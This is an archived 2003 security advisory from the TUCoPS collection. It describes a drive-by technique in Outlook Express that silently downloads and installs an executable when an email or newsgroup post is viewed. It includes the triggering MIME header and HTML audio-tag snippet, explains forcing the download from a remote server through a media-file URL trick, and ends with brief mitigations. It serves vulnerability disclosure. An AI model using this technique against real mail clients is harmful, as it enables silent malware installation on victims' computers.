Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Windows :: bt231.txt

Restricted Zone: the OUTLOOK EXPRESS

Tuesday, 20 May, 2003

Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 

This can be achieved with the default setting of Outlook Express: 

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 

<html xmlns:t>
<t:audio  t:src=""  />

What that does is invoke our freakish media file including our trusty 
and battle-hardened 0s URL flip from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe: and 
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP and [WMP 9 fails]

First Step Working Example:


1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability ': which appears to never have 
been patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from 
untrustworthy sources

End Call


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH